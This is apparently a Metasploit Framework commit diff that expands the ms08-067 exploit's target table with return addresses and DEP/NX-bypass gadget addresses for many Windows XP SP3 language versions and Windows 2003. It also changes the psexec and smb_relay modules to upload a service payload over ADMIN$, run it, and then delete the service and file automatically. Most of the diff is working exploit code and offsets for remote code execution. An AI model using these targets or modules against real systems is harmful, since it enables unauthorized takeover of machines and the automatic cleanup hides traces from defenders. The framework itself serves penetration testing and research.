The psexec and smb_relay module now automatically cleanup. The ms08-06 module now supports all languages of XP SP3.
git-svn-id: file:///home/svn/framework3/trunk@5841 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
d573c31be9
commit
0881649f14
|
@ -387,12 +387,12 @@ module Exploit::Remote::SMB
|
|||
[
|
||||
Rex::Text.to_unicode('Remotedrucker')
|
||||
],
|
||||
'Portugese - Brazilian' =>
|
||||
'Portuguese - Brazilian' =>
|
||||
[
|
||||
Rex::Text.to_unicode('Impr. remotas Windows NT'),
|
||||
Rex::Text.to_unicode('Impressoras remotas do Windows NT')
|
||||
],
|
||||
'Portguese' =>
|
||||
'Portuguese' =>
|
||||
[
|
||||
Rex::Text.to_unicode('Imp. remotas do Windows NT')
|
||||
],
|
||||
|
|
|
@ -67,6 +67,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
#
|
||||
[ 'Automatic Targeting', { 'auto' => true } ],
|
||||
|
||||
|
||||
#
|
||||
# UNIVERSAL TARGETS
|
||||
#
|
||||
|
||||
#
|
||||
# Antoine's universal for Windows 2000
|
||||
# Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
|
||||
|
@ -82,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Standard return-to-ESI without NX bypass
|
||||
# Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
|
||||
#
|
||||
[ 'Windows XP SP0/SP1 Universal (NO NX)',
|
||||
[ 'Windows XP SP0/SP1 Universal',
|
||||
{
|
||||
'Ret' => 0x01001361,
|
||||
'Scratch' => 0x00020408,
|
||||
|
@ -90,8 +95,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
], # JMP ESI SVCHOST.EXE
|
||||
|
||||
#
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# ENGLISH TARGETS
|
||||
#
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 English (NX)',
|
||||
{
|
||||
'Ret' => 0x6f88f727,
|
||||
|
@ -100,9 +107,70 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 English (NX)',
|
||||
{
|
||||
'Ret' => 0x6f88f807,
|
||||
'DisableNX' => 0x6F8917C2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Standard return-to-ESI without NX bypass
|
||||
[ 'Windows 2003 SP0 English (NO NX)',
|
||||
{
|
||||
'Ret' => 0x71bf175f,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI WS2HELP.DLL
|
||||
|
||||
|
||||
# Standard return-to-ESI without NX bypass
|
||||
[ 'Windows 2003 SP1 English (NO NX)',
|
||||
{
|
||||
'Ret' => 0x71bf21a2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI WS2HELP.DLL
|
||||
|
||||
# Brett Moore's crafty NX bypass for 2003 SP1
|
||||
[ 'Windows 2003 SP1 English (NX)',
|
||||
{
|
||||
'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL
|
||||
'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL
|
||||
'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL
|
||||
'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
],
|
||||
|
||||
# Standard return-to-ESI without NX bypass
|
||||
[ 'Windows 2003 SP2 English (NO NX)',
|
||||
{
|
||||
'Ret' => 0x71bf3969,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI WS2HELP.DLL
|
||||
|
||||
# Brett Moore's crafty NX bypass for 2003 SP2
|
||||
[ 'Windows 2003 SP2 English (NX)',
|
||||
{
|
||||
'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL
|
||||
'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
|
||||
'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL
|
||||
'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
],
|
||||
|
||||
|
||||
#
|
||||
# NON-ENGLISH TARGETS
|
||||
#
|
||||
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 French (NX)',
|
||||
{
|
||||
'Ret' => 0x595bf727,
|
||||
|
@ -127,7 +195,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Target provided by Ramon de C. Valle <ramon@risesecurity.org>
|
||||
#
|
||||
[ 'Windows XP SP2 Portuguese (Brazil) (NX)',
|
||||
[ 'Windows XP SP2 Portuguese - Brazilian (NX)',
|
||||
{
|
||||
'Ret' => 0x596ff727,
|
||||
'DisableNX' => 0x597016e2,
|
||||
|
@ -150,7 +218,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Target provided by sunwear <shellcoder[at]hotmail.com>
|
||||
#
|
||||
[ 'Windows XP SP2 Chinese - Traditional (NX)',
|
||||
[ 'Windows XP SP2 Chinese - Simplified (NX)',
|
||||
{
|
||||
'Ret' => 0x58fcda43,
|
||||
'DisableNX' => 0x58fc16e2,
|
||||
|
@ -168,18 +236,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
#
|
||||
[ 'Windows XP SP3 English (NX)',
|
||||
{
|
||||
'Ret' => 0x6f88f807,
|
||||
'DisableNX' => 0x6F8917C2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Target provided by Ulises2k <ulises2k[at]gmail.com>
|
||||
|
@ -203,11 +259,56 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Russian (NX)',
|
||||
{
|
||||
'Ret' => 0x6fe1f807,
|
||||
'DisableNX' => 0x6fe217c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Same as Russian
|
||||
[ 'Windows XP SP3 Czech (NX)',
|
||||
{
|
||||
'Ret' => 0x6fe1f807,
|
||||
'DisableNX' => 0x6fe217c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Turkish (NX)',
|
||||
{
|
||||
'Ret' => 0x5a78f807,
|
||||
'DisableNX' => 0x5a7917c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Swedish (NX)',
|
||||
{
|
||||
'Ret' => 0x597af807,
|
||||
'DisableNX' => 0x597b17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Portuguese (NX)',
|
||||
{
|
||||
'Ret' => 0x596bf807,
|
||||
'DisableNX' => 0x596c17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Target provided by Ramon de C. Valle <ramon@risesecurity.org>
|
||||
#
|
||||
[ 'Windows XP SP3 Portugese - Brazilian (NX)',
|
||||
[ 'Windows XP SP3 Portuguese - Brazilian (NX)',
|
||||
{
|
||||
'Ret' => 0x596ff807,
|
||||
'DisableNX' => 0x597017c2,
|
||||
|
@ -215,61 +316,133 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Standard return-to-ESI without NX bypass
|
||||
#
|
||||
[ 'Windows 2003 SP0 English (NO NX)',
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Same as Portuguese
|
||||
[ 'Windows XP SP3 Italian (NX)',
|
||||
{
|
||||
'Ret' => 0x71bf175f,
|
||||
'Ret' => 0x596bf807,
|
||||
'DisableNX' => 0x596c17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI WS2HELP.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Standard return-to-ESI without NX bypass
|
||||
#
|
||||
[ 'Windows 2003 SP1 English (NO NX)',
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Polish (NX)',
|
||||
{
|
||||
'Ret' => 0x71bf21a2,
|
||||
'Ret' => 0x5941f807,
|
||||
'DisableNX' => 0x594217c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI WS2HELP.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Standard return-to-ESI without NX bypass
|
||||
#
|
||||
[ 'Windows 2003 SP2 English (NO NX)',
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Norwegian (NX)',
|
||||
{
|
||||
'Ret' => 0x71bf3969,
|
||||
'Ret' => 0x597cf807,
|
||||
'DisableNX' => 0x597d17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI WS2HELP.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Brett Moore's crafty NX bypass for 2003 SP1
|
||||
#
|
||||
[ 'Windows 2003 SP1 English (NX)',
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Korean (NX)',
|
||||
{
|
||||
'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL
|
||||
'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL
|
||||
'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL
|
||||
'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL
|
||||
'Ret' => 0x6fd6f807,
|
||||
'DisableNX' => 0x6fd717c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
],
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Brett Moore's crafty NX bypass for 2003 SP2
|
||||
#
|
||||
[ 'Windows 2003 SP2 English (NX)',
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Japanese (NX)',
|
||||
{
|
||||
'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL
|
||||
'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
|
||||
'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL
|
||||
'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
|
||||
'Ret' => 0x567fd4d2,
|
||||
'DisableNX' => 0x568017c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
]
|
||||
], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Hungarian (NX)',
|
||||
{
|
||||
'Ret' => 0x5970f807,
|
||||
'DisableNX' => 0x597117c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Hebrew (NX)',
|
||||
{
|
||||
'Ret' => 0x5940f807,
|
||||
'DisableNX' => 0x594117c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Finnish (NX)',
|
||||
{
|
||||
'Ret' => 0x597df807,
|
||||
'DisableNX' => 0x597e17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Greek (NX)',
|
||||
{
|
||||
'Ret' => 0x592af807,
|
||||
'DisableNX' => 0x592b17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Danish (NX)',
|
||||
{
|
||||
'Ret' => 0x5978f807,
|
||||
'DisableNX' => 0x597917c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Chinese - Simplified (NX)',
|
||||
{
|
||||
'Ret' => 0x58fbf807,
|
||||
'DisableNX' => 0x58fc17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Chinese - Traditional (NX)',
|
||||
{
|
||||
'Ret' => 0x5860f807,
|
||||
'DisableNX' => 0x586117c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Same as Chinese Traditional
|
||||
[ 'Windows XP SP3 Chinese - Traditional / Taiwan (NX)',
|
||||
{
|
||||
'Ret' => 0x5860f807,
|
||||
'DisableNX' => 0x586117c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Arabic (NX)',
|
||||
{
|
||||
'Ret' => 0x6fd8f807,
|
||||
'DisableNX' => 0x6fd917c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Missing Targets
|
||||
|
|
|
@ -191,7 +191,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
rescue ::Exception => e
|
||||
end
|
||||
|
||||
|
||||
##
|
||||
# OpenServiceW
|
||||
##
|
||||
|
@ -211,12 +210,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return
|
||||
end
|
||||
|
||||
|
||||
# print_line(" ")
|
||||
# print_status("You *MUST* manually remove the service: (#{servicename} - \"#{displayname}\")")
|
||||
# print_status("You *MUST* manually delete the service file: %SYSTEMROOT%\\#{filename}")
|
||||
# print_line(" ")
|
||||
|
||||
##
|
||||
# StartService()
|
||||
##
|
||||
|
@ -234,12 +227,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return
|
||||
end
|
||||
|
||||
|
||||
##
|
||||
# Give the process time to initialize
|
||||
##
|
||||
print_status("Waiting on process to initialize...")
|
||||
|
||||
##
|
||||
# DeleteService()
|
||||
##
|
||||
|
@ -254,7 +241,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Error: #{e}")
|
||||
end
|
||||
|
||||
|
||||
##
|
||||
# CloseHandle()
|
||||
##
|
||||
|
@ -265,7 +251,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Error: #{e}")
|
||||
end
|
||||
|
||||
|
||||
print_status("Deleting \\#{filename}...")
|
||||
simple.connect("ADMIN$")
|
||||
simple.delete("\\#{filename}")
|
||||
|
|
|
@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Uploading payload...")
|
||||
filename = rand_text_alpha(8) + ".exe"
|
||||
fd = rclient.open("\\#{filename}", 'rwct')
|
||||
fd << Rex::Text.to_win32pe(code.encoded)
|
||||
fd << Rex::Text.to_win32pe_service(code.encoded,rand_text_alpha(8))
|
||||
fd.close
|
||||
print_status("Created \\#{filename}...")
|
||||
|
||||
|
@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
##
|
||||
|
||||
servicename = rand_text_alpha(8)
|
||||
displayname = 'M' + rand_text_alpha(rand(32)+1)
|
||||
displayname = rand_text_alpha(rand(32)+1)
|
||||
svc_handle = nil
|
||||
svc_status = nil
|
||||
|
||||
|
@ -227,11 +227,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return
|
||||
end
|
||||
|
||||
print_line(" ")
|
||||
print_status("You *MUST* manually remove the service: #{smb[:rhost]} (#{servicename} - \"#{displayname}\")")
|
||||
print_status("You *MUST* manually delete the service file: #{smb[:rhost]} %SYSTEMROOT%\\#{filename}")
|
||||
print_line(" ")
|
||||
|
||||
##
|
||||
# StartService()
|
||||
##
|
||||
|
@ -249,7 +244,33 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Error: #{e}")
|
||||
end
|
||||
|
||||
handler(smb[:rsock])
|
||||
##
|
||||
# DeleteService()
|
||||
##
|
||||
print_status("Removing the service...")
|
||||
stubdata =
|
||||
svc_handle
|
||||
begin
|
||||
response = dcerpc.call(0x02, stubdata)
|
||||
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
|
||||
end
|
||||
rescue ::Exception => e
|
||||
print_status("Error: #{e}")
|
||||
end
|
||||
|
||||
##
|
||||
# CloseHandle()
|
||||
##
|
||||
print_status("Closing service handle...")
|
||||
begin
|
||||
response = dcerpc.call(0x0, svc_handle)
|
||||
rescue ::Exception => e
|
||||
print_status("Error: #{e}")
|
||||
end
|
||||
|
||||
print_status("Deleting \\#{filename}...")
|
||||
simple.connect("ADMIN$")
|
||||
simple.delete("\\#{filename}")
|
||||
end
|
||||
|
||||
|
||||
|
@ -324,7 +345,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
target_host = smb[:ip]
|
||||
end
|
||||
|
||||
|
||||
rsock = nil
|
||||
rport = nil
|
||||
[445, 139].each do |rport|
|
||||
|
@ -363,7 +383,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
raise e
|
||||
end
|
||||
|
||||
|
||||
if (not rclient.client.challenge_key)
|
||||
print_error("No challenge key received from #{smb[:ip]}:#{rport}")
|
||||
rsock.close
|
||||
|
|
Loading…
Reference in New Issue